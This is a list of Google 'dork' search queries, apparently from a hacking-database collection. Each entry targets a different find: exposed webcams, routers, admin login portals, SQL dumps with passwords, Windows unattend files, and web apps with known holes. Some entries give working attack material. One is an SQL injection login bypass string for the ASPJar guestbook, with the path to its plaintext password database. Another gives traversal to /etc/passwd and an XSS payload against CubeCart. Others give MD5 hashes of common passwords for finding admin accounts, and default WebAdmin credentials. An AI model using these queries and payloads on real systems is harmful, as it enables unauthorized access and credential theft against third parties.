[[url]http://www.google.com/search?q=intitle:%22web+server+status%22+SSH+Telnet[url]]
[[dork]intitle:"web server status" SSH Telnet[dork]]
[end][1040]]
[[start][1041]
[[title] intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"[title]]
[[descr]Open groupware is a comprehensive open source groupware project running on all major platforms.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1041]]
[[start][1042]
[[title]intitle:Linksys site:ourlinksys.com[[title]]
[[descr]Ourlinksys.com DDNS entries pointing to Linksys web enabled cameras [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3ALinksys+site%3Aourlinksys.com+&btnG=Search[url]]
[[dork]intitle:Linksys site:ourlinksys.com [dork]]
[end][1042]]
[[start][1043]
[[title]intitle:"supervisioncam protocol"[title]]
[[descr]"SupervisionCam captures and compares images from video cameras, (internet) image files or the computer screen at intervals you define. It starts optional activities when a movement is detected." [descr]]
[[url]http://www.google.com/search?q=intitle:%22supervisioncam+protocol%22[url]]
[[dork]intitle:"supervisioncam protocol"[dork]]
[end][1043]]
[[start][1044]
[[title]+"HSTSNR" -"netop.com"[title]]
[[descr]This search reveals NetOp license files. From the netop website: "NetOp Remote Control is the most comprehensive, effective and security-conscious way to maintain your IT operations. Designed to fit into all environments, NetOp lets you access users running virtually any operating system, including Windows, Linux, Mac OS X and Solaris. Location isn’t terribly important either. The program offers unrivalled connectivity, supporting all standard communication protocols. Finally, NetOp is also the ideal way to manage and administrate your servers. The system contains a sweeping range of remote management tools, all available on one easy-to-use console."descr]]
[[url]http://www.google.com/search?hl=en&q=%2B%22HSTSNR%22+-%22netop.com%22&btnG=Google+Search[url]]
[[dork]+"HSTSNR" -"netop.com"[dork]]
[end][1044]]
[[start][1045]
[[title]inurl:getmsg.html intitle:hotmail[[title]]
[[descr]These pages contain hotmail messages that were saved as HTML. These messages can contain anything from personal data to cleartext passwords.[descr]]
[[url]http://www.google.com/search?q=inurl:getmsg.html+intitle:hotmail&ie=UTF-8&oe=UTF-8[url]]
[[dork]inurl:getmsg.html intitle:hotmail[dork]]
[end][1045]]
[[start][1046]
[[title]intext:"Please enter correct password for Administrator Access. Thank you" "Copyright © 2003 SMC Networks, Inc. All rights reserved."[title]]
[[descr]Finds SMC Routers. [descr]]
[[url]http://www.google.com/search?q=intext%3A%22Please+enter+correct+password+for+Administrator+Access%2E+Thank+you%22+%22Copyright+%C2%A9+2003+SMC+Networks%2C+Inc%2E+All+rights+reserved%2E%22[url]]
[[dork]intext:"Please enter correct password for Administrator Access. Thank you" "Copyright © 2003 SMC Networks, Inc. All rights reserved."[dork]]
[end][1046]]
[[start][1058]
[[title]"delete entries" inurl:admin/delete.asp[[title]]
[[descr]As described in OSVDB article #13715:
"AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity."
The company supporting this software is no longer in business and the software is no longer being updated. Therefore, versions should not matter in this dork.[descr]]
[[url]http://www.google.com/search?q=%22delete+entries%22+inurl%3Aadmin%2Fdelete.asp[url]]
[[dork]"delete entries" inurl:admin/delete.asp[dork]]
[end][1058]]
[[start][1059]
[[title]inurl:camctrl.cgi[[title]]
[[descr]Vivotec web cams[descr]]
[[url]http://www.google.com/search?q=inurl%3Acamctrl.cgi[url]]
[[dork]inurl:camctrl.cgi[dork]]
[end][1059]]
[[start][1060]
[[title]allintitle:Brains, Corp. camera[[title]]
[[descr]mmEye webcam / cam server
mmEye is a multifunction multimedia server equipped with 32bit RISC CPU SH-3, and runs UNIX operating system (NetBSD).
It has video input ports (1 S signal port, 2 composite signal ports) and PCMCIA Type II slots built in.[descr]]
[[url]http://www.google.com/search?q=allintitle:Brains,+Corp.+camera[url]]
[[dork]allintitle:Brains, Corp. camera[dork]]
[end][1060]]
[[start][1061]
[[title]"Traffic Analysis for" "RMON Port * on unit *"[title]]
[[descr]List of RMON ports produced by MRTG which is a network traffic analysis tool. See also #198[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=%22Traffic+Analysis+for%22+%22RMON+Port+*+on+unit+*%22&btnG=Search[url]]
[[dork]"Traffic Analysis for" "RMON Port * on unit *"[dork]]
[end][1061]]
[[start][1062]
[[title]allintitle:aspjar.com guestbook[[title]]
[[descr]"An input validation vulnerability was reported in the ASPJar guestbook. A remote user can gain administrative access and can delete guestbook messages.
The '/admin/login.asp' script does not properly validate user-supplied input in the password field. A remote user can supply the following characters in password field to inject SQL commands and be authenticated as the administrator:"
' or ''='
I also found another vulnerability that hasn't been documented anywhere. Using the above search to find aspjar guestbooks, appending the guestbook directory with /data/guest.mdb will give you a database containing the plaintext username and password for the guestbook admin and all entries in the guestbook, including IP addresses of users.
(This company is no longer in business and the software is no longer being updated so versions shouldn't matter)[descr]]
[[url]http://www.google.com/search?q=allintitle:aspjar.com+guestbook[url]]
[[dork]allintitle:aspjar.com guestbook[dork]]
[end][1062]]
[[start][1063]
[[title]filetype:sql ("values * MD5" | "values * password" | "values * encrypt")[[title]]
[[descr]Locate insert statements making use of some builtin function to encrypt a password. PASSWORD(), ENCRYPT() and MD5() are searched.
[descr]]
[[url]http://www.google.com/search?num=100&q=filetype%3Asql+%28%22values+%2A+MD5+%2A%22+%7C+%22values+%2A+password+%2A%22+%7C+%22values+%2A+encrypt+%2A%22%29[url]]
[[dork]filetype:sql ("values * MD5 *" | "values * password *" | "values * encrypt *")[dork]]
[end][1063]]
[[start][1064]
[[title]filetype:sql ("passwd values" | "password values" | "pass values" )[[title]]
[[descr]Find insert statements where the field (or table name) preceding the operator VALUES will be 'password' or 'passwd' or 'pass'. The rest of the statement should contain encrypted or plaintext password.
An attacker can use these files to acquire database permissions that normally would not be given to the masses.[descr]]
[[url]http://www.google.com/search?num=100&q=+filetype%3Asql+%28%22passwd+values+%2A%2A%2A%2A%22+%7C+%22password+values+%2A%2A%2A%2A%22+%7C+%22pass+values+%2A%2A%2A%2A%22+%29[url]]
[[dork] filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )[dork]]
[end][1064]]
[[start][1065]
[[title]"powered by andromeda version" (filetype:php | filetype:asp)[[title]]
[[descr]Andromeda MP3 server for Windows, Linux, and Mac OS X.[descr]]
[[url]http://www.google.com/search?num=100&q=%22powered+by+andromeda+version%22+%28filetype%3Aphp+%7C+filetype%3Aasp%29[url]]
[[dork]"powered by andromeda version" (filetype:php | filetype:asp)[dork]]
[end][1065]]
[[start][1066]
[[title](inurl:81-cobalt | inurl:cgi-bin/.cobalt)[[title]]
[[descr]Cobal RaQ internal pages[descr]]
[[url]http://www.google.com/search?q=(inurl:81-cobalt+%7C+inurl:cgi-bin/.cobalt)[url]]
[[dork](inurl:81-cobalt | inurl:cgi-bin/.cobalt)[dork]]
[end][1066]]
[[start][1067]
[[title]inurl:WCP_USER[[title]]
[[descr]WebConnect is client-server based software that provides secure browser based emulation to mainframe, midrange and UNIX systems[descr]]
[[url]http://www.google.com/search?q=inurl%3AWCP_USER[url]]
[[dork]inurl:WCP_USER[dork]]
[end][1067]]
[[start][1075]
[[title]intitle:"Kurant Corporation StoreSense" filetype:bok[[title]]
[[descr]These are Kurant StoreSense admin logon pages.[descr]]
[[url]http://www.google.com/search?hl=en&q=filetype%3Abok+intitle%3A%22Kurant+Corporation+StoreSense%22&filter=0[url]]
[[dork]filetype:bok intitle:"Kurant Corporation StoreSense"[dork]]
[end][1075]]
[[start][1077]
[[title]intitle:"Dell Laser Printer" ews[[title]]
[[descr]Finds Dell's printers with EWS.
EWS : Embedded Web Server technology enables the usage of a standard web browser to manage many aspects of the printer, for example, view consumable life, configure network parameters, view serial number information, printer usage etc..[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Dell+Laser+Printer%22+ews[url]]
[[dork]intitle:"Dell Laser Printer" ews[dork]]
[end][1077]]
[[start][1079]
[[title]intitle:"active webcam page"[title]]
[[descr]Searches for "Active Webcam" feeds on websites, a popular USB webcam interface.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22active+webcam+page%22[url]]
[[dork]intitle:"active webcam page"[dork]]
[end][1079]]
[[start][1080]
[[title]"powered by CubeCart 2.0"[title]]
[[descr]This search reveals an alarming number of servers running versions of Brooky CubeCart that are reported to be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied data.
...susceptible to a remote directory traversal vulnerability
...cross-site scripting vulnerability may allow for theft of cookie-based authentication credentials or other attacks.
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/index.php?&language=../../../../../../../../etc/passwd
http://www.example.com/index.php?&language=var%20test_variable=31337;alert(test_variable);
Vulnerability was published 2-14-2005
http://www.securityfocus.com/bid/12549/[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&as_qdr=all&q=+%22powered+by+CubeCart+2.0%22[url]]
[[dork] "powered by CubeCart 2.0"[dork]]
[end][1080]]
[[start][1082]
[[title]intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."[title]]
[[descr]People who have foolishly published an audit of their machine(s) on the net with some server info as well[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1082]]
[[start][1084]
[[title]filetype:ora tnsnames[[title]]
[[descr]This searches for tns names files. This is an Oracle configuration file that sets up connection strings for someone's Oracle client to contact the various databases it is managing. This file contains ports, IP's and server names of these database machines. What I think is more telling is that in most cases, this file is stored in Oracle's installation directory which can probably be more telling.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=filetype%3Aora+tnsnames[url]]
[[dork]filetype:ora tnsnames[dork]]
[end][1084]]
[[start][1085]
[[title]intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"[title]]
[[descr]Another way to find the web administration portal of linux open exchange servers.[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22SuSE+Linux+Openexchange+Server%22+%22Please+activate+JavaScript%21%22[url]]
[[dork]intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"[dork]]
[end][1085]]
[[start][1087]
[[title]inurl:"suse/login.pl"[title]]
[[descr]More Suse login portals, mostly Open Exchange.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%22suse%2Flogin.pl%22[url]]
[[dork]inurl:"suse/login.pl"[dork]]
[end][1087]]
[[start][1091]
[[title]intitle:HomeSeer.Web.Control | Home.Status.Events.Log[[title]]
[[descr]HomeSeer (http://www.homeseer.com/) provides a well known home automation solution (software + hardware)
This dork will find web interfaces of homeseer.[descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3AHomeSeer.Web.Control+%7C+Home.Status.Events.Log[url]]
[[dork]intitle:HomeSeer.Web.Control | Home.Status.Events.Log[dork]]
[end][1091]]
[[start][1093]
[[title]"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3[[title]]
[[descr]this is a mod of one of the previous queries posted in here. the basic thing is, to add this:
21232f297a57a5a743894a0e4a801fc3
to your query, that oryginally results in a username lists with a MD5 encrypted password.
this one finds mysql dumps with for a users who's passwords
are "admin" :)
the "21232f297a57a5a743894a0e4a801fc3" is md5 result for "admin"
you can try it with other queris on this site.
use also:
63a9f0ea7bb98050796b649e85481845 for root
098f6bcd4621d373cade4e832627b4f6 for test
3c3662bcb661d6de679c636744c66b62 for sex
f561aaf6ef0bf14d4208bb46a4ccb3ad for xxx
if you'll get lucky, you'll get a username, and a encryoted password, witch is the one above that u used.
remember, that this works for all files that contain plaintex username and md5 encrypted passwords. use this techniq with other queris that you'll find here
uff... i hope i made my self clear.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22%23mysql+dump%22+filetype%3Asql+21232f297a57a5a743894a0e4a801fc3&btnG=Search[url]]
[[dork]"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3[dork]]
[end][1093]]
[[start][1096]
[[title]Powered.by.RaidenHTTPD intitle:index.of[[title]]
[[descr]RaidenHTTPD ( http://www.raidenhttpd.com/en ) is a full featured web server software for Windows[descr]]
[[url]http://www.google.com/search?num=100&q=Powered.by.RaidenHTTPD+intitle%3Aindex.of[url]]
[[dork]Powered.by.RaidenHTTPD intitle:index.of[dork]]
[end][1096]]
[[start][1097]
[[title]filetype:ini Desktop.ini intext:mydocs.dll[[title]]
[[descr]This dork finds any webshared windows folder inside my docs. You can change the end bit "intext:mydocs.dll" by looking inside any of your your own folders on your pc, looking for the desktop.ini file and add some of the information to the query. For Anouther example - Shell Folders (Favourite etc)
filetype:ini Desktop.iniintext:shell32.dll
Enjoy[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&as_qdr=all&q=filetype%3Aini+Desktop.ini+intext%3Amydocs.dll&btnG=Search[url]]
[[dork]filetype:ini Desktop.ini intext:mydocs.dll[dork]]
[end][1097]]
[[start][1098]
[[title]allinurl:wps/portal/ login[[title]]
[[descr]Login to IBM WebSphere Portal.
You may find portals using standard administrator user/password which gave you complete access to the application itself.
[descr]]
[[url]http://www.google.com/search?q=allinurl%3Awps%2Fportal%2F+login&btnG=Cerca&meta=[url]]
[[dork]allinurl:wps/portal/ login[dork]]
[end][1098]]
[[start][1099]
[[title]intitle:"phpPgAdmin - Login" Language[[title]]
[[descr]phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services[descr]]
[[url]http://www.google.com/search?q=intitle:%22phpPgAdmin+-+Login%22+Language&hl=en&lr=&c2coff=1&start=10&sa=N[url]]
[[dork]intitle:"phpPgAdmin - Login" Language[dork]]
[end][1099]]
[[start][1101]
[[title]powered.by.modIndex.0.0[[title]]
[[descr]Modindex is replacement to the default apache directory indexer with one that is a little more user friendly.[descr]]
[[url]http://www.google.com/search?num=100&q=powered.by.modIndex.0.0[url]]
[[dork]powered.by.modIndex.0.0[dork]]
[end][1101]]
[[start][1102]
[[title]intitle:asterisk.management.portal web-access[[title]]
[[descr]Coalescent Systems Inc. launched The Asterisk Management Portal project to bring together best-of-breed applications to produce a "canned" (but fully functional) turn-key small business phone system based on The Asterisk Open Source PBX. [descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1102]]
[[start][1103]
[[title]intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists[[title]]
[[descr]Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22Flash+Operator+Panel%22+-ext%3Aphp+-wiki+-cms+-inurl%3Aasternic+-inurl%3Asip+-intitle[url]]
[[dork]intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle[dork]]
[end][1103]]
[[start][1104]
[[title]ext:txt inurl:unattend.txt[[title]]
[[descr]the unattend.txt is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=ext%3Atxt+inurl%3Aunattend.txt&btnG=Search[url]]
[[dork]ext:txt inurl:unattend.txt[dork]]
[end][1104]]
[[start][1105]
[[title]filetype:inf sysprep[[title]]
[[descr]Sysprep is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=filetype%3Ainf+sysprep+&btnG=Search[url]]
[[dork]filetype:inf sysprep [dork]]
[end][1105]]
[[start][1106]
[[title]intitle:"Service Managed Gateway Login"[title]]
[[descr]Service Managed Gateway from VirtualAccess login page[descr]]
[[url]http://www.google.com/search?q=intitle:%22Service+Managed+Gateway+Login%22+&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]intitle:"Service Managed Gateway Login" [dork]]
[end][1106]]
[[start][1107]
[[title]"Powered by UebiMiau" -site:sourceforge.net[[title]]
[[descr]UebiMiau is a simple, yet efficient cross-plataform POP3/IMAP mail reader written in PHP. It's have some many features, such as: Folders, View and Send Attachments, Preferences, Search, Quota Limit[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+UebiMiau%22+-site%3Asourceforge.net[url]]
[[dork]"Powered by UebiMiau" -site:sourceforge.net[dork]]
[end][1107]]
[[start][1108]
[[title]inurl:webmail./index.pl "Interface"[title]]
[[descr]Webmail system which reveals that the website is hosted by vDeck[descr]]
[[url]http://www.google.com/search?q=inurl%3Awebmail.%2Findex.pl+%22Interface%22[url]]
[[dork]inurl:webmail./index.pl "Interface"[dork]]
[end][1108]]
[[start][1109]
[[title]intitle:"BorderWare MXtreme Mail Firewall Login"[title]]
[[descr]BorderWare MXtreme Mail firewall
MXtreme is a hardened appliance with a highly robust mail transfer agent (MTA) and email gateway that prevents email-borne threats from entering your network while protecting against spam and viruses. [descr]]
[[url]http://www.google.com/search?q=intitle:%22BorderWare+MXtreme+Mail+Firewall+Login%22[url]]
[[dork]intitle:"BorderWare MXtreme Mail Firewall Login"[dork]]
[end][1109]]
[[start][1110]
[[title]intitle:"actiontec" main setup status "Copyright 2001 Actiontec Electronics Inc"[title]]
[[descr]Actiontec Routers.[descr]]
[[url]http://www.google.com/search?q=intitle:%22actiontec%22+main+setup+status+%22Copyright+2001+Actiontec+Electronics+Inc%22&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]intitle:"actiontec" main setup status "Copyright 2001 Actiontec Electronics Inc"[dork]]
[end][1110]]
[[start][1111]
[[title]intitle:"Point. Click. Edit."[title]]
[[descr]'Point and Click' WYSIWYG web site building tool[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Point.+Click.+Edit.%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]intitle:"Point. Click. Edit."[dork]]
[end][1111]]
[[start][1112]
[[title]Powered.by:.vBulletin.Version ...3.0.6[[title]]
[[descr]vBulletin is reported prone to an arbitrary PHP script code execution vulnerability. The issue is reported to exist due to a lack of sufficient input sanitization performed on user-supplied data before this data is included in a dynamically generated script
http://www.securityfocus.com/bid/12622/info/[descr]]
[[url]http://www.google.com/search?q=Powered.by%3A.vBulletin.Version+...3.0.6&btnG=Search[url]]
[[dork]Powered.by:.vBulletin.Version ...3.0.6[dork]]
[end][1112]]
[[start][1113]
[[title]intitle:"VMware Management Interface:" inurl:"vmware/en/"[title]]
[[descr]VMware GSX Server is enterprise-class virtual infrastructure software for x86-based servers. It is ideal for server consolidation, disaster recovery and streamlining software development processes.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22VMware+Management+Interface%3A%22+inurl%3A%22vmware%2Fen%2F%22[url]]
[[dork]intitle:"VMware Management Interface:" inurl:"vmware/en/"[dork]]
[end][1113]]
[[start][1114]
[[title]filetype:php intitle:"paNews v2.0b4"[title]]
[[descr]PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script.
http://www.securityfocus.com/bid/12611[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=filetype%3Aphp+intitle%3A%22paNews+v2.0b4%22+&btnG=Search[url]]
[[dork]filetype:php intitle:"paNews v2.0b4" [dork]]
[end][1114]]
[[start][1115]
[[title]"Webthru User Login"[title]]
[[descr]Samsung webthru cameras[descr]]
[[url]http://www.google.com/search?q=%22Webthru+User+Login%22&hl=en&lr=&filter=0[url]]
[[dork]"Webthru User Login"[dork]]
[end][1115]]
[[start][1116]
[[title]inurl:x10/index.cgi[[title]]
[[descr]Scott Crevier's X-10 home automation Web Interface.
Allows an attacker to control home appliances from a web site.
[descr]]
[[url]http://www.google.com/search?q=inurl:x10/index.cgi&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]inurl:x10/index.cgi[dork]]
[end][1116]]
[[start][1117]
[[title]ext:cgi intitle:"control panel" "enter your owner password to continue!"[title]]
[[descr]Free Perl Guestbook (FPG) administration page. Only a password is needed to logon.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=ext%3Acgi++intitle%3A%22control+panel%22+%22enter+your+owner+password+to+continue%21%22&btnG=Search[url]]
[[dork]ext:cgi intitle:"control panel" "enter your owner password to continue!"[dork]]
[end][1117]]
[[start][1118]
[[title]intitle:"ListMail Login" admin -demo[[title]]
[[descr]Listmail mailinglist manager admin logon[descr]]
[[url]http://www.google.com/search?q=intitle:%22ListMail+Login%22+admin+-demo&filter=0[url]]
[[dork]intitle:"ListMail Login" admin -demo[dork]]
[end][1118]]
[[start][1119]
[[title]intitle:"Test Page for the Apache HTTP Server on Fedora Core" intext:"Fedora Core Test Page"[title]]
[[descr]Apache 2.0 on Fedore Core Test page [descr]]
[[url]http://www.google.com/search?q=intitle:%22Test+Page+for+the+Apache+HTTP+Server+on+Fedora+Core%22+intext:%22Fedora+Core+Test+Page%22&filter=0[url]]
[[dork]intitle:"Test Page for the Apache HTTP Server on Fedora Core" intext:"Fedora Core Test Page"[dork]]
[end][1119]]
[[start][1122]
[[title]wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin[[title]]
[[descr]This is a filtered version of previous 'inurl:passwd' searches, focusing on WWWBoard [1]. There are different crypt functions involved [2], but the default username and password is 'WebAdmin:WebBoard' without the quotes. This is my first Googledork entry, so be gentle :)
Funny enough, many of the DES hashes seem to use a salt of "ae". I tried just using this string along with the inurl portion, but it seemed to inappropriately restrict the search. Couple this with [3] and, um, yeah.
cykyc
[1]http://www.scriptarchive.com/wwwboard.html
[2]http://www.scriptarchive.com/faq/wwwboard.html#q2
[3]http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=625[descr]]
[[url]http://www.google.com/search?q=wwwboard+WebAdmin++inurl:passwd.txt+wwwboard%7Cwebadmin+&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin [dork]]
[end][1122]]
[[start][1126]
[[title]"Powered by: vBulletin Version 1.1.5"[title]]
[[descr]This google dork reveals vulnerable message boards. It works for all Vbulletin version up to 2.0 beta 2. To try for other versions just change the version number in the dork.
These vulnerable message boards allow remote code execution.
More on this can be found here:
http://www.securiteam.com/securitynews/5IP0B203PI.html
it has a fairly good explanation of the exploits incorporated with these versions.
[descr]]
[[url]http://www.google.com/search?q=%22Powered+by%3A+vBulletin+Version+1.1.5%22[url]]
[[dork]"Powered by: vBulletin Version 1.1.5"[dork]]
[end][1126]]
[[start][1130]
[[title]intitle:index.of /maildir/new/[[title]]
[[descr]Search gives you a mailbox dir. Contains a lot of mails.[descr]]
[[url]http://www.google.com/search?q=intitle%3Aindex.of+%2Fmaildir%2Fnew%2F[url]]
[[dork]intitle:index.of /maildir/new/[dork]]
[end][1130]]
[[start][1133]
[[title]intitle:asterisk.management.portal web-access[[title]]
[[descr]VOXBOX Asterisk web management. Allows to manage Asterisk configuration like calls and SIP settings.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1133]]
[[start][1134]
[[title]intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists[[title]]
[[descr]Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time. [descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Flash+Operator+Panel%22+-ext%3Aphp+-wiki+-cms+-inurl%3Aasternic+-inurl%3Asip+-intitle%3AANNOUNCE+-inurl%3Alists+&btnG=Search[url]]
[[dork]intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists [dork]]
[end][1134]]
[[start][1135]
[[title]"Powered by Coppermine Photo Gallery" ( "v1.2.2 b" | "v1.2.1" | "v1.2" | "v1.1" | "v1.0")[[title]]
[[descr]Reportedly Coppermine Photo Gallery is prone to multiple input validation vulnerabilities, some of which may lead to arbitrary command execution. These issues are due to the application failing to properly sanitize and validate user-supplied input prior to using it in dynamic content and system command execution function calls.
These issues may be exploited to steal cookie based authentication credentials, map the application root directory of the affected application, execute arbitrary commands and include arbitrary files. Other attacks are also possible.
http://www.securityfocus.com/bid/10253/[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Coppermine+Photo+Gallery%22+%28+%22v1.2.2+b%22+%7C+%22v1.2.1%22+%7C+%22v1.2%22+%7C+%22v1.1%22+%7C+%22v1.0%22%29&btnG=Se[url]]
[[dork]"Powered by Coppermine Photo Gallery" ( "v1.2.2 b" | "v1.2.1" | "v1.2" | "v1.1" | "v1.0")[dork]]
[end][1135]]
[[start][1137]
[[title]intitle:"IPC@CHIP Infopage"[title]]
[[descr]web server detection for IPC@chip embedded webserver
The dork uses the webserver's infopage which reveals some very interesting information.
See securityfocus advisory for more info: http://www.securityfocus.com/bid/2767
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22IPC%40CHIP+Infopage%22+&btnG=Search[url]]
[[dork]intitle:"IPC@CHIP Infopage" [dork]]
[end][1137]]
[[start][1138]
[[title]"APC Console Port Management Server" intitle:"Console Port Management Server"[title]]
[[descr]APC Remote console server
APC's Console Port Servers are 0U and 1U devices that enable remote management of Linux, Unix, Sun and Windows 2003 servers and other devices. They provide access, activity monitoring, event logging, and facilitate automated configuration. Maintain secure communication with devices in your data center or branch offices independent of network availability. [descr]]
[[url]http://www.google.com/search?q=%22APC+Console+Port+Management+Server%22+intitle%3A%22Console+Port+Management+Server%22&btnG=Search[url]]
[[dork]"APC Console Port Management Server" intitle:"Console Port Management Server"[dork]]
[end][1138]]
[[start][1139]
[[title]thttpd webserver[[title]]
[[descr]thttpd is is a webserver written in C and should compile and run on most unix-like systems. As of version 2.20 or later, thttpd is known to build and run on the following platforms, usually on at least recent platform versions:
* FreeBSD
* NetBSD
* BSD/OS
* Solaris
* Tru64 / DIGITAL UNIX / OSF/1
* SunOS
* Linux
* HP-UX
* MacOS X
* UnixWare
* AMIGAOS
* NCR MP-RAS BASE 3.02 (EISA/MCA)
* Sega Dreamcast
* Compaq iPaq 3765
* Windows 2000/XP (port of 2.07 only)
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Index+of+*%22+mode++links++bytes++last-changed++name[url]]
[[dork]intitle:"Index of *" mode links bytes last-changed name[dork]]
[end][1139]]
[[start][1140]
[[title]WebLog Referrers[[title]]
[[descr]ExpressionEngine is a modular, flexible, feature-packed web publishing system that adapts to a broad range of needs.[descr]]
[[url]http://www.google.com/search?q=allinurl:%22weblog/referrers%22&sourceid=opera&num=0&ie=utf-8&oe=utf-8[url]]
[[dork]allinurl:"weblog/referrers"[dork]]
[end][1140]]
[[start][1143]
[[title]yaws.*.server.at[[title]]
[[descr]YAWS (http://yaws.hyber.org), Yet Another Web Server, is a HTTP high perfomance 1.1 webserver.
Yaws is entirely written in Erlang, furthermore it is a multithreaded webserver where one Erlang light weight process is used to handle each client.[descr]]
[[url]http://www.google.com/search?q=yaws.%2A.server.at[url]]
[[dork]yaws.*.server.at[dork]]
[end][1143]]
[[start][1144]
[[title]intitle:endymion.saké.mail.login.page | inurl:sake.servlet[[title]]
[[descr]Saké Mail, servlet-based web email system, designed for scaling to large numbers of concurrent users. Intended for large universities or enterprise-level mail system[descr]]
[[url]http://www.google.com/search?q=intitle%3Aendymion.sak%C3%A9.mail.login.page+%7C+inurl%3Asake.servlet&num=100[url]]
[[dork]intitle:endymion.saké.mail.login.page | inurl:sake.servlet[dork]]
[end][1144]]
[[start][1145]
[[title]inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0[[title]]
[[descr]eHealth, a network management solution, enables its users to manage performance and availability of LANs, WANs, routers, Switches, Frame Relay, ATM, Remote Access Equipment, QoS, Wireless LAN, DAL, Voice and Cable technologies.[descr]]
[[url]http://www.google.com/search?num=100&q=inurl%3Abin.welcome.sh+%7C+inurl%3Abin.welcome.bat+%7C+intitle%3AeHealth.5.0[url]]
[[dork]inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0[dork]]
[end][1145]]
[[start][1147]
[[title]powered.by.instaBoard.version.1.3[[title]]
[[descr]InstaBoard is a coldfusion forum solution. In its version 1.3 it is vulnerable to SQL Injection.
Bugtraq ID 7338[descr]]
[[url]http://www.google.com/search?num=100&q=powered.by.instaBoard.version.1.3[url]]
[[dork]powered.by.instaBoard.version.1.3[dork]]
[end][1147]]
[[start][1149]
[[title]intitle:"OfficeConnect Wireless 11g Access Point" "Checking your browser"[title]]
[[descr]OfficeConnect Wireless 11g Access Point[descr]]
[[url]http://www.google.com/search?q=intitle:%22OfficeConnect+Wireless+11g+Access+Point%22+%22Checking+your+browser%22&hl=en&lr=&filter=0[url]]
[[dork]intitle:"OfficeConnect Wireless 11g Access Point" "Checking your browser"[dork]]
[end][1149]]
[[start][1150]
[[title]intitle:"Lexmark *" inurl:port_0[[title]]
[[descr]Lexmark printers (4 models)[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Lexmark+*%22+inurl%3Aport_0&filter=0[url]]
[[dork]intitle:"Lexmark *" inurl:port_0[dork]]
[end][1150]]
[[start][1151]
